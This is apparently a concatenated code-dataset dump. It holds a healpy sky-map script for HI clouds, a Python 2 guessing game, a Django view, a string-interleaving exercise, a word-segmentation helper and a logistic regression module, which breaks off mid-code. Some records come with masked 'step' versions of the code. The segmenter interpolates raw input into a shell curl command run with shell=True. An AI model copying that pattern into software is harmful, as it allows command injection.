#healpix_map[np.where(healpix_map == 0)] = hp.UNSEEN # Set empty pixels to UNSEEN
"""
For full
"""
full_map = np.zeros(hp.nside2npix(nside), dtype=np.double)
full_map[pix] = full # Magic
#full_map[np.where(healpix_map == 0)] = hp.UNSEEN # Set empty pixels to UNSEEN
"""
Full end
"""
le = full_map - healpix_map
ma = le[::-1]
ma[np.where(ma == 0)] = hp.UNSEEN
full_map[np.where(full_map == 0)] = hp.UNSEEN
fu = full_map[::-1]
healpix_map[np.where(healpix_map == 0)] = hp.UNSEEN
se = healpix_map[::-1]
"""
hp.write_map(path+'data/fullHI50.fits',fu, partial=True)
hp.write_map(path+'data/segmentedHI50.fits',se, partial=True)
hp.write_map(path+'data/cloudsFITS/subtractedHI50fits',ma, partial=True)
"""
#min = 4.
#max = 350.
hp.mollview(fu,title="Full map +50 GLAT",sub=311)
hp.mollview(se,title="Above threshold (4.0) +50 GLAT", sub = 312)
hp.mollview(ma,title="Diff +50 GLAT",sub=313)
plt.savefig('figs/diff4a.pdf', bbox_inches='tight',pad_inches=0.106)
plt.show()
"""
NX = 4320
NY = 2160
#image_array = resize(LOScloudsN,(NY,NX)) # Resizing image
"""
|
normal
|
{
"blob_id": "d86fd2e6ef5dab4444772192471538842112b3fd",
"index": 2675,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nhp.mollview(fu, title='Full map +50 GLAT', sub=311)\nhp.mollview(se, title='Above threshold (4.0) +50 GLAT', sub=312)\nhp.mollview(ma, title='Diff +50 GLAT', sub=313)\nplt.savefig('figs/diff4a.pdf', bbox_inches='tight', pad_inches=0.106)\nplt.show()\n<mask token>\n",
"step-3": "<mask token>\nstart = time.time()\npath = '/Users/trygveleithesvalheim/datafiles/'\nNN = 338\nNS = 438\nnside = 512\nnpix = 12 * nside ** 2\nz = np.zeros((1680, 4320))\n<mask token>\nc1 = 420\nc2 = 475\nhdulist = pf.open(path + 'data/cubesCombinedN.fits')\nNfull = hdulist[0].data\nhdulist = pf.open(path + 'data/cubesCombinedS.fits')\nSfull = hdulist[0].data\nfullLOSN = Nfull[c1:c2].sum(axis=0)\nfullLOSS = Sfull[c1:c2].sum(axis=0)\nfullLOSS = np.concatenate((fullLOSS, z), axis=0)\nfullLOSN = np.concatenate((z, fullLOSN), axis=0)\nfull = fullLOSN + fullLOSS\n<mask token>\nhdulist = pf.open(path + 'data/LOScloudsN.fits')\nLOScloudsN = hdulist[0].data\nhdulist = pf.open(path + 'data/LOScloudsS.fits')\nLOScloudsS = hdulist[0].data\nLOScloudsN = LOScloudsN.sum(axis=0)\nLOScloudsS = LOScloudsS.sum(axis=0)\nLOScloudsS = np.concatenate((LOScloudsS, z), axis=0)\nLOScloudsN = np.concatenate((z, LOScloudsN), axis=0)\nimage_array = LOScloudsN + LOScloudsS\n<mask token>\ntheta = np.linspace(0, np.pi, num=image_array.shape[0])[:, None]\nphi = np.linspace(-np.pi, np.pi, num=image_array.shape[1])\npix = hp.ang2pix(nside, theta, phi)\n<mask token>\nhealpix_map = np.zeros(hp.nside2npix(nside), dtype=np.double)\nhealpix_map[pix] = image_array\n<mask token>\nfull_map = np.zeros(hp.nside2npix(nside), dtype=np.double)\nfull_map[pix] = full\n<mask token>\nle = full_map - healpix_map\nma = le[::-1]\nma[np.where(ma == 0)] = hp.UNSEEN\nfull_map[np.where(full_map == 0)] = hp.UNSEEN\nfu = full_map[::-1]\nhealpix_map[np.where(healpix_map == 0)] = hp.UNSEEN\nse = healpix_map[::-1]\n<mask token>\nhp.mollview(fu, title='Full map +50 GLAT', sub=311)\nhp.mollview(se, title='Above threshold (4.0) +50 GLAT', sub=312)\nhp.mollview(ma, title='Diff +50 GLAT', sub=313)\nplt.savefig('figs/diff4a.pdf', bbox_inches='tight', pad_inches=0.106)\nplt.show()\n<mask token>\n",
"step-4": "from skimage import data, filters, measure, exposure\nfrom skimage.filters import threshold_mean\nfrom skimage.transform import resize\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pyfits as pf\nimport time\nimport numpy as np\nimport healpy as hp\nfrom healpy.projector import CartesianProj\nfrom healpy.projector import MollweideProj\nstart = time.time()\npath = '/Users/trygveleithesvalheim/datafiles/'\nNN = 338\nNS = 438\nnside = 512\nnpix = 12 * nside ** 2\nz = np.zeros((1680, 4320))\n<mask token>\nc1 = 420\nc2 = 475\nhdulist = pf.open(path + 'data/cubesCombinedN.fits')\nNfull = hdulist[0].data\nhdulist = pf.open(path + 'data/cubesCombinedS.fits')\nSfull = hdulist[0].data\nfullLOSN = Nfull[c1:c2].sum(axis=0)\nfullLOSS = Sfull[c1:c2].sum(axis=0)\nfullLOSS = np.concatenate((fullLOSS, z), axis=0)\nfullLOSN = np.concatenate((z, fullLOSN), axis=0)\nfull = fullLOSN + fullLOSS\n<mask token>\nhdulist = pf.open(path + 'data/LOScloudsN.fits')\nLOScloudsN = hdulist[0].data\nhdulist = pf.open(path + 'data/LOScloudsS.fits')\nLOScloudsS = hdulist[0].data\nLOScloudsN = LOScloudsN.sum(axis=0)\nLOScloudsS = LOScloudsS.sum(axis=0)\nLOScloudsS = np.concatenate((LOScloudsS, z), axis=0)\nLOScloudsN = np.concatenate((z, LOScloudsN), axis=0)\nimage_array = LOScloudsN + LOScloudsS\n<mask token>\ntheta = np.linspace(0, np.pi, num=image_array.shape[0])[:, None]\nphi = np.linspace(-np.pi, np.pi, num=image_array.shape[1])\npix = hp.ang2pix(nside, theta, phi)\n<mask token>\nhealpix_map = np.zeros(hp.nside2npix(nside), dtype=np.double)\nhealpix_map[pix] = image_array\n<mask token>\nfull_map = np.zeros(hp.nside2npix(nside), dtype=np.double)\nfull_map[pix] = full\n<mask token>\nle = full_map - healpix_map\nma = le[::-1]\nma[np.where(ma == 0)] = hp.UNSEEN\nfull_map[np.where(full_map == 0)] = hp.UNSEEN\nfu = full_map[::-1]\nhealpix_map[np.where(healpix_map == 0)] = hp.UNSEEN\nse = healpix_map[::-1]\n<mask token>\nhp.mollview(fu, title='Full map +50 GLAT', sub=311)\nhp.mollview(se, title='Above threshold (4.0) +50 GLAT', sub=312)\nhp.mollview(ma, title='Diff +50 GLAT', sub=313)\nplt.savefig('figs/diff4a.pdf', bbox_inches='tight', pad_inches=0.106)\nplt.show()\n<mask token>\n",
"step-5": "from skimage import data, filters, measure, exposure\nfrom skimage.filters import threshold_mean\nfrom skimage.transform import resize\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pyfits as pf\nimport time\nimport numpy as np\nimport healpy as hp\nfrom healpy.projector import CartesianProj\nfrom healpy.projector import MollweideProj\n# [email protected]\nstart = time.time()\npath = '/Users/trygveleithesvalheim/datafiles/'\n\n\n# MAX SLIDES ON N: 134 (ID:135) and 136 (ID:137)\n# MAX SLIDES ON S: 6 (ID:7)\n# Data: 360 degrees longitude, 50-90 latitude\n# Dimensions: (480,4320)\n# Full map: (2160,4320) need to add 1680\n\nNN = 338 # Identified clouds in N. hemisphere\nNS = 438 # Identified clouds in S. hemisphere\nnside = 512\nnpix = 12*nside**2\nz = np.zeros((1680, 4320)) # Extra array for full sky array\n\n\"\"\"\nfull\n\"\"\"\nc1 = 420\nc2 = 475\nhdulist = pf.open(path+'data/cubesCombinedN.fits')\nNfull = hdulist[0].data\nhdulist = pf.open(path+'data/cubesCombinedS.fits')\nSfull = hdulist[0].data\n\nfullLOSN = Nfull[c1:c2].sum(axis=(0))\nfullLOSS = Sfull[c1:c2].sum(axis=(0))\n\n# Add empty array for converting to full sky\nfullLOSS = np.concatenate((fullLOSS, z), axis=0)\nfullLOSN = np.concatenate((z,fullLOSN), axis=0)\n\nfull = fullLOSN + fullLOSS\n\"\"\"\nAdd full first\n\"\"\"\nhdulist = pf.open(path+'data/LOScloudsN.fits')\nLOScloudsN = hdulist[0].data\nhdulist = pf.open(path+'data/LOScloudsS.fits')\nLOScloudsS = hdulist[0].data\n\n# LOS of all clouds\nLOScloudsN = LOScloudsN.sum(axis=(0))\nLOScloudsS = LOScloudsS.sum(axis=(0))\n\n# Add empty array for converting to full sky\nLOScloudsS = np.concatenate((LOScloudsS, z), axis=0)\nLOScloudsN = np.concatenate((z,LOScloudsN), axis=0)\n\n# Add N and S hemisphere\nimage_array = LOScloudsN+LOScloudsS\n\n\"\"\"\nGENERAL\n\"\"\"\n# Find theta and phi coordinates of image\ntheta = np.linspace(0, np.pi, num=image_array.shape[0])[:, None]\nphi = np.linspace(-np.pi, np.pi, num=image_array.shape[1])\n\n# Get pixel positions of full picture\npix = hp.ang2pix(nside, theta, phi)\n\n\"\"\"\nGENERAL END\n\"\"\"\n# Make healpix map array\nhealpix_map = np.zeros(hp.nside2npix(nside), dtype=np.double)\n\n# put image in healpy map array\nhealpix_map[pix] = image_array # Magic\n#healpix_map[np.where(healpix_map == 0)] = hp.UNSEEN # Set empty pixels to UNSEEN\n\n\"\"\"\nFor full\n\"\"\"\nfull_map = np.zeros(hp.nside2npix(nside), dtype=np.double)\n\nfull_map[pix] = full # Magic\n#full_map[np.where(healpix_map == 0)] = hp.UNSEEN # Set empty pixels to UNSEEN\n\n\"\"\"\nFull end\n\"\"\"\nle = full_map - healpix_map\nma = le[::-1]\nma[np.where(ma == 0)] = hp.UNSEEN\n\nfull_map[np.where(full_map == 0)] = hp.UNSEEN\nfu = full_map[::-1]\nhealpix_map[np.where(healpix_map == 0)] = hp.UNSEEN\nse = healpix_map[::-1]\n\n\"\"\"\nhp.write_map(path+'data/fullHI50.fits',fu, partial=True)\nhp.write_map(path+'data/segmentedHI50.fits',se, partial=True)\nhp.write_map(path+'data/cloudsFITS/subtractedHI50fits',ma, partial=True)\n\"\"\"\n#min = 4.\n#max = 350.\nhp.mollview(fu,title=\"Full map +50 GLAT\",sub=311)\nhp.mollview(se,title=\"Above threshold (4.0) +50 GLAT\", sub = 312)\nhp.mollview(ma,title=\"Diff +50 GLAT\",sub=313)\nplt.savefig('figs/diff4a.pdf', bbox_inches='tight',pad_inches=0.106)\nplt.show()\n\n\"\"\"\nNX = 4320\nNY = 2160\n#image_array = resize(LOScloudsN,(NY,NX)) # Resizing image\n\"\"\"\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# __ __ __ ______ __
# / | / | / | / \ / |
# $$ | $$ |_$$ |_ ______ ______ _______ /$$$$$$ | ______ $$/ _______ _______
# $$ \/$$// $$ | / \ / \ / \ $$ | $$/ / \ / |/ \ / |
# $$ $$< $$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$ | $$ | /$$$$$$ |$$ |$$$$$$$ |/$$$$$$$/
# $$$$ \ $$ | __ $$ $$ |$$ | $$/ $$ | $$ | $$ | __ $$ | $$ |$$ |$$ | $$ |$$ \
# $$ /$$ | $$ |/ |$$$$$$$$/ $$ | $$ | $$ | $$ \__/ |$$ \__$$ |$$ |$$ | $$ | $$$$$$ |
#$$ | $$ | $$ $$/ $$ |$$ | $$ | $$ | $$ $$/ $$ $$/ $$ |$$ | $$ |/ $$/
#$$/ $$/ $$$$/ $$$$$$$/ $$/ $$/ $$/ $$$$$$/ $$$$$$/ $$/ $$/ $$/ $$$$$$$/
#made with http://patorjk.com/software/taag/
# Xtern Intern Techincal interview
# Josh Martin
# [email protected]
# 2016
import json
import uuid
import random
import time
## Location of file
filename ="data.json"
def newGuess():
# makes new numbers each time alled
return random.randint(0,10)
# init guess
correctGuess = newGuess()
def newUser():
# new init of a user
userid = str(uuid.uuid1())
data={userid:{'coins':0,'guess':0}}
with open(filename,'w') as f:
json.dump(data,f)
return userid
def OpenJson():
# opens the json file satisfied at the top of the document
with open(filename,'r+') as f:
data =json.load(f)
return data
def AddACoin(userid):
# adds a coin to current user
data = OpenJson()
tmp=data[userid]['coins']
tmp+=1
data[userid]['coins']=tmp
JsonFile=open(filename,"w+")
JsonFile.write(json.dumps(data))
JsonFile.close()
def GuessCount(userid):
# keeps track of guess
data = OpenJson()
tmp=data[userid]['guess']
tmp+=1
data[userid]['guess']=tmp
JsonFile=open(filename,"w+")
JsonFile.write(json.dumps(data))
JsonFile.close()
print 'that is {} trys in total.'.format(tmp)
def GetCoins(userid):
# gets current amount of coins
getamount =OpenJson()[userid]['coins']
return getamount
def HandleGuess(userid,guess):
# returns a Boolean value based off if the guess is right or not
print 'the current user, "{}" has guessed: {}'.format(userid,guess)
if guess == correctGuess:
print 'the user,"{}" has guessed correctly and now has {} XternCoins.'.format(userid,(GetCoins(userid)+1))
return True
print 'the user has nt guessed right, please try again.'
return False
def StartGuessing():
user =newUser()
while True:
print("""
__ __ __ ______ __
/ | / | / | / \ / |
$$ | $$ |_$$ |_ ______ ______ _______ /$$$$$$ | ______ $$/ _______ _______
$$ \/$$// $$ | / \ / \ / \ $$ | $$/ / \ / |/ \ / |
$$ $$< $$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$ | $$ | /$$$$$$ |$$ |$$$$$$$ |/$$$$$$$/
$$$$ \ $$ | __ $$ $$ |$$ | $$/ $$ | $$ | $$ | __ $$ | $$ |$$ |$$ | $$ |$$ \
$$ /$$ | $$ |/ |$$$$$$$$/ $$ | $$ | $$ | $$ \__/ |$$ \__$$ |$$ |$$ | $$ | $$$$$$ |
$$ | $$ | $$ $$/ $$ |$$ | $$ | $$ | $$ $$/ $$ $$/ $$ |$$ | $$ |/ $$/
$$/ $$/ $$$$/ $$$$$$$/ $$/ $$/ $$/ $$$$$$/ $$$$$$/ $$/ $$/ $$/ $$$$$$$/
""") #cheap "gui" to clear the screen a bit and look pretty
print 'the current user, "{}" has {} XternCoins'.format(user,OpenJson()[user]['coins'])
guess =HandleGuess(user,random.randint(0,10))
if guess :
AddACoin(user)
correctGuess=newGuess() # makes a new number to guess
GuessCount(user)
time.sleep(3) # makes program readable to humans not just computers
|
normal
|
{
"blob_id": "ae72d832039f36149988da02d8a4174d80a4ecfb",
"index": 2350,
"step-1": "\n # __ __ __ ______ __\n# / | / | / | / \\ / |\n# $$ | $$ |_$$ |_ ______ ______ _______ /$$$$$$ | ______ $$/ _______ _______\n# $$ \\/$$// $$ | / \\ / \\ / \\ $$ | $$/ / \\ / |/ \\ / |\n # $$ $$< $$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$ | $$ | /$$$$$$ |$$ |$$$$$$$ |/$$$$$$$/\n# $$$$ \\ $$ | __ $$ $$ |$$ | $$/ $$ | $$ | $$ | __ $$ | $$ |$$ |$$ | $$ |$$ \\\n# $$ /$$ | $$ |/ |$$$$$$$$/ $$ | $$ | $$ | $$ \\__/ |$$ \\__$$ |$$ |$$ | $$ | $$$$$$ |\n#$$ | $$ | $$ $$/ $$ |$$ | $$ | $$ | $$ $$/ $$ $$/ $$ |$$ | $$ |/ $$/\n#$$/ $$/ $$$$/ $$$$$$$/ $$/ $$/ $$/ $$$$$$/ $$$$$$/ $$/ $$/ $$/ $$$$$$$/\n\n#made with http://patorjk.com/software/taag/\n\n# Xtern Intern Techincal interview\n# Josh Martin\n# [email protected]\n# 2016\n\nimport json\nimport uuid\nimport random\nimport time\n\n## Location of file\nfilename =\"data.json\"\n\ndef newGuess():\n # makes new numbers each time alled\n return random.randint(0,10)\n\n# init guess \ncorrectGuess = newGuess()\n\ndef newUser():\n # new init of a user\n userid = str(uuid.uuid1())\n data={userid:{'coins':0,'guess':0}}\n with open(filename,'w') as f:\n json.dump(data,f)\n return userid\ndef OpenJson():\n # opens the json file satisfied at the top of the document\n with open(filename,'r+') as f:\n data =json.load(f)\n return data\n \ndef AddACoin(userid):\n # adds a coin to current user\n data = OpenJson()\n tmp=data[userid]['coins']\n tmp+=1\n data[userid]['coins']=tmp\n JsonFile=open(filename,\"w+\")\n JsonFile.write(json.dumps(data))\n JsonFile.close()\n\ndef GuessCount(userid):\n # keeps track of guess\n data = OpenJson()\n tmp=data[userid]['guess']\n tmp+=1\n data[userid]['guess']=tmp\n JsonFile=open(filename,\"w+\")\n JsonFile.write(json.dumps(data))\n JsonFile.close()\n print 'that is {} trys in total.'.format(tmp)\n\ndef GetCoins(userid):\n # gets current amount of coins\n getamount =OpenJson()[userid]['coins']\n return getamount\n\ndef HandleGuess(userid,guess):\n # returns a Boolean value based off if the guess is right or not\n print 'the current user, \"{}\" has guessed: {}'.format(userid,guess)\n if guess == correctGuess:\n print 'the user,\"{}\" has guessed correctly and now has {} XternCoins.'.format(userid,(GetCoins(userid)+1))\n return True\n print 'the user has nt guessed right, please try again.'\n return False\n \ndef StartGuessing():\n user =newUser()\n while True:\n print(\"\"\" \n \n \n \n \n \n __ __ __ ______ __ \n/ | / | / | / \\ / | \n$$ | $$ |_$$ |_ ______ ______ _______ /$$$$$$ | ______ $$/ _______ _______ \n$$ \\/$$// $$ | / \\ / \\ / \\ $$ | $$/ / \\ / |/ \\ / |\n $$ $$< $$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$ | $$ | /$$$$$$ |$$ |$$$$$$$ |/$$$$$$$/ \n $$$$ \\ $$ | __ $$ $$ |$$ | $$/ $$ | $$ | $$ | __ $$ | $$ |$$ |$$ | $$ |$$ \\ \n $$ /$$ | $$ |/ |$$$$$$$$/ $$ | $$ | $$ | $$ \\__/ |$$ \\__$$ |$$ |$$ | $$ | $$$$$$ |\n$$ | $$ | $$ $$/ $$ |$$ | $$ | $$ | $$ $$/ $$ $$/ $$ |$$ | $$ |/ $$/ \n$$/ $$/ $$$$/ $$$$$$$/ $$/ $$/ $$/ $$$$$$/ $$$$$$/ $$/ $$/ $$/ $$$$$$$/\n \n \n \n \n \n \n \n \n \n \n \"\"\") #cheap \"gui\" to clear the screen a bit and look pretty \n print 'the current user, \"{}\" has {} XternCoins'.format(user,OpenJson()[user]['coins'])\n guess =HandleGuess(user,random.randint(0,10))\n if guess :\n AddACoin(user)\n correctGuess=newGuess() # makes a new number to guess\n GuessCount(user)\n time.sleep(3) # makes program readable to humans not just computers\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.shortcuts import render
from django.views.generic import TemplateView
# Create your views here.
def index(request):
context = 'Welcome home'
return render(request,'base.html',{'context':context})
class HomePageView(TemplateView):
template_name = 'base.html'
|
normal
|
{
"blob_id": "f0a54feaa165a393c4e87cbac2a38347633acf5a",
"index": 1425,
"step-1": "<mask token>\n\n\nclass HomePageView(TemplateView):\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass HomePageView(TemplateView):\n template_name = 'base.html'\n",
"step-3": "<mask token>\n\n\ndef index(request):\n context = 'Welcome home'\n return render(request, 'base.html', {'context': context})\n\n\nclass HomePageView(TemplateView):\n template_name = 'base.html'\n",
"step-4": "from django.shortcuts import render\nfrom django.views.generic import TemplateView\n\n\ndef index(request):\n context = 'Welcome home'\n return render(request, 'base.html', {'context': context})\n\n\nclass HomePageView(TemplateView):\n template_name = 'base.html'\n",
"step-5": "from django.shortcuts import render\nfrom django.views.generic import TemplateView\n\n# Create your views here.\ndef index(request):\n context = 'Welcome home'\n return render(request,'base.html',{'context':context})\n\nclass HomePageView(TemplateView):\n template_name = 'base.html'\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/env python
def question():
print("02. 「パトカー」+「タクシー」=「パタトクカシーー」")
print("「パトカー」+「タクシー」の文字を先頭から交互に連結して文字列「パタトクカシーー」を得よ.")
def main():
str1 = "パトカー"
str2 = "タクシー"
print(''.join([x[0] + x[1] for x in zip(str1, str2)]))
if __name__ == '__main__':
question()
main()
|
normal
|
{
"blob_id": "32869a88bb59d47281249b6ebe2357328beb0359",
"index": 3572,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n str1 = 'パトカー'\n str2 = 'タクシー'\n print(''.join([(x[0] + x[1]) for x in zip(str1, str2)]))\n\n\n<mask token>\n",
"step-3": "def question():\n print('02. 「パトカー」+「タクシー」=「パタトクカシーー」')\n print('「パトカー」+「タクシー」の文字を先頭から交互に連結して文字列「パタトクカシーー」を得よ.')\n\n\ndef main():\n str1 = 'パトカー'\n str2 = 'タクシー'\n print(''.join([(x[0] + x[1]) for x in zip(str1, str2)]))\n\n\n<mask token>\n",
"step-4": "def question():\n print('02. 「パトカー」+「タクシー」=「パタトクカシーー」')\n print('「パトカー」+「タクシー」の文字を先頭から交互に連結して文字列「パタトクカシーー」を得よ.')\n\n\ndef main():\n str1 = 'パトカー'\n str2 = 'タクシー'\n print(''.join([(x[0] + x[1]) for x in zip(str1, str2)]))\n\n\nif __name__ == '__main__':\n question()\n main()\n",
"step-5": "#!/usr/bin/env python\n\ndef question():\n print(\"02. 「パトカー」+「タクシー」=「パタトクカシーー」\")\n print(\"「パトカー」+「タクシー」の文字を先頭から交互に連結して文字列「パタトクカシーー」を得よ.\")\n\ndef main():\n str1 = \"パトカー\"\n str2 = \"タクシー\"\n print(''.join([x[0] + x[1] for x in zip(str1, str2)]))\n\nif __name__ == '__main__':\n question()\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
import os
import logging
import subprocess
import json
import sys
ROOT_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(ROOT_PATH)
from src.datafactory.common import json_util
from src.datafactory.config import constant
class SegmentProcess(object):
"""
function for segment
"""
def do_nlp_seg(self, sentence):
"""
connect nlp wordseg
"""
cmd = "curl -d '{\"lang_id\":1,\"lang_para\":0,\"query\":\"%s\"}" \
"' %s?username=%s\&app=%s\&encoding=utf8" % (
sentence,
constant.SEGMENT_URL,
constant.SEGMENT_USERNAME,
constant.SEGMENT_APP
)
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
retn = p.communicate()[0]
except Exception as e:
logging.critical("segment(%s) failed and try again:%s" % (sentence, e))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
retn = p.communicate()[0]
return retn
def deparser(self, segment_result_str):
segment_result = []
try:
segment_result_dict = json.loads(segment_result_str,
object_hook=json_util._decode_dict)
if "scw_out" in segment_result_dict and "wordsepbuf" in segment_result_dict["scw_out"]:
wordsepbuf = segment_result_dict["scw_out"]["wordsepbuf"]
wordsepbuf_split = wordsepbuf.strip("\t").split("\t")
for word in wordsepbuf_split:
segment_result.append(word)
else:
logging.critical("segment result(%s) error without wordsepbuf"
% segment_result_str)
except ValueError as e:
logging.critical("deparser segment result(%s) failed: %s" % (segment_result_str, e))
return segment_result
def get_segment(ori_data):
seg = SegmentProcess()
result = seg.do_nlp_seg(ori_data)
segment_result = seg.deparser(result)
return segment_result
if __name__ == "__main__":
print get_segment("同意 写论文的时候 用百度查一个庭园方面的术语\\\"ll")
|
normal
|
{
"blob_id": "96ea9b2b4d892ac88f7fac9594a6d2ad5d69a7c7",
"index": 7479,
"step-1": "# -*- coding: utf-8 -*-\n\nimport os\nimport logging\nimport subprocess\nimport json\nimport sys\n\nROOT_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(ROOT_PATH)\n\nfrom src.datafactory.common import json_util\nfrom src.datafactory.config import constant\n\n\nclass SegmentProcess(object):\n \"\"\"\n function for segment\n \"\"\"\n\n def do_nlp_seg(self, sentence):\n \"\"\"\n connect nlp wordseg\n \"\"\"\n cmd = \"curl -d '{\\\"lang_id\\\":1,\\\"lang_para\\\":0,\\\"query\\\":\\\"%s\\\"}\" \\\n \"' %s?username=%s\\&app=%s\\&encoding=utf8\" % (\n sentence,\n constant.SEGMENT_URL,\n constant.SEGMENT_USERNAME,\n constant.SEGMENT_APP\n )\n try:\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n retn = p.communicate()[0]\n except Exception as e:\n logging.critical(\"segment(%s) failed and try again:%s\" % (sentence, e))\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n retn = p.communicate()[0]\n\n return retn\n\n def deparser(self, segment_result_str):\n segment_result = []\n try:\n segment_result_dict = json.loads(segment_result_str,\n object_hook=json_util._decode_dict)\n if \"scw_out\" in segment_result_dict and \"wordsepbuf\" in segment_result_dict[\"scw_out\"]:\n wordsepbuf = segment_result_dict[\"scw_out\"][\"wordsepbuf\"]\n wordsepbuf_split = wordsepbuf.strip(\"\\t\").split(\"\\t\")\n for word in wordsepbuf_split:\n\n segment_result.append(word)\n else:\n logging.critical(\"segment result(%s) error without wordsepbuf\"\n % segment_result_str)\n except ValueError as e:\n logging.critical(\"deparser segment result(%s) failed: %s\" % (segment_result_str, e))\n return segment_result\n\n\ndef get_segment(ori_data):\n seg = SegmentProcess()\n result = seg.do_nlp_seg(ori_data)\n segment_result = seg.deparser(result)\n return segment_result\n\n\nif __name__ == \"__main__\":\n print get_segment(\"同意 写论文的时候 用百度查一个庭园方面的术语\\\\\\\"ll\")\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env/ python
# -*- coding:utf-8 -*-
# Created by: Vanish
# Created on: 2019/9/25
import numpy as np
from scipy import optimize
def sigmoid(z):
return 1 / (1 + np.exp(-z))
def costReg(theta, X, y, lamda):
theta = np.matrix(theta)
X = np.matrix(X)
y = np.matrix(y)
first = np.multiply(-y, np.log(sigmoid(X * theta.T)))
second = np.multiply((1 - y), np.log(1 - sigmoid(X * theta.T)))
reg = (lamda / (2 * len(X))) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2))
return np.sum(first - second) / len(X) + reg
def gradientReg(theta, X, y, lamda):
theta = np.matrix(theta)
X = np.matrix(X)
y = np.matrix(y)
parameters = int(theta.ravel().shape[1])
grad = np.zeros(parameters)
error = sigmoid(X * theta.T) - y
for i in range(parameters):
term = np.multiply(error, X[:, i])
if (i == 0):
grad[i] = np.sum(term) / len(X)
else:
grad[i] = (np.sum(term) / len(X)) + ((lamda / len(X)) * theta[:, i])
return grad
def predict(theta, X):
probability = sigmoid(X * theta.T)
return [1 if x >= 0.5 else 0 for x in probability]
def implement_for_LR(X_train, X_test, y_train, y_test,lamda=1):
n = X_train.shape[1]
# convert to numpy arrays and initalize the parameter array theta
X_train = np.array(X_train.values)
y_train = np.array(y_train.values)
theta = np.zeros(n)
result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg, args=(X_train, y_train, lamda))
theta_min = np.matrix(result[0])
predictions = predict(theta_min, X_test)
correct = [1 if ((a == 1 and b == 1) or (a == 0 and b == 0)) else 0 for (a, b) in zip(predictions, y_test)]
accuracy = (sum(map(int, correct)) % len(correct))
print('accuracy = {0}%'.format(accuracy))
|
normal
|
{
"blob_id": "991c361043eb1539a80b5e8e1db44bc365e7e639",
"index": 6345,
"step-1": "<mask token>\n\n\ndef predict(theta, X):\n probability = sigmoid(X * theta.T)\n return [(1 if x >= 0.5 else 0) for x in probability]\n\n\ndef implement_for_LR(X_train, X_test, y_train, y_test, lamda=1):\n n = X_train.shape[1]\n X_train = np.array(X_train.values)\n y_train = np.array(y_train.values)\n theta = np.zeros(n)\n result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg,\n args=(X_train, y_train, lamda))\n theta_min = np.matrix(result[0])\n predictions = predict(theta_min, X_test)\n correct = [(1 if a == 1 and b == 1 or a == 0 and b == 0 else 0) for a,\n b in zip(predictions, y_test)]\n accuracy = sum(map(int, correct)) % len(correct)\n print('accuracy = {0}%'.format(accuracy))\n",
"step-2": "<mask token>\n\n\ndef gradientReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n error = sigmoid(X * theta.T) - y\n for i in range(parameters):\n term = np.multiply(error, X[:, i])\n if i == 0:\n grad[i] = np.sum(term) / len(X)\n else:\n grad[i] = np.sum(term) / len(X) + lamda / len(X) * theta[:, i]\n return grad\n\n\ndef predict(theta, X):\n probability = sigmoid(X * theta.T)\n return [(1 if x >= 0.5 else 0) for x in probability]\n\n\ndef implement_for_LR(X_train, X_test, y_train, y_test, lamda=1):\n n = X_train.shape[1]\n X_train = np.array(X_train.values)\n y_train = np.array(y_train.values)\n theta = np.zeros(n)\n result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg,\n args=(X_train, y_train, lamda))\n theta_min = np.matrix(result[0])\n predictions = predict(theta_min, X_test)\n correct = [(1 if a == 1 and b == 1 or a == 0 and b == 0 else 0) for a,\n b in zip(predictions, y_test)]\n accuracy = sum(map(int, correct)) % len(correct)\n print('accuracy = {0}%'.format(accuracy))\n",
"step-3": "<mask token>\n\n\ndef sigmoid(z):\n return 1 / (1 + np.exp(-z))\n\n\ndef costReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n first = np.multiply(-y, np.log(sigmoid(X * theta.T)))\n second = np.multiply(1 - y, np.log(1 - sigmoid(X * theta.T)))\n reg = lamda / (2 * len(X)) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2)\n )\n return np.sum(first - second) / len(X) + reg\n\n\ndef gradientReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n error = sigmoid(X * theta.T) - y\n for i in range(parameters):\n term = np.multiply(error, X[:, i])\n if i == 0:\n grad[i] = np.sum(term) / len(X)\n else:\n grad[i] = np.sum(term) / len(X) + lamda / len(X) * theta[:, i]\n return grad\n\n\ndef predict(theta, X):\n probability = sigmoid(X * 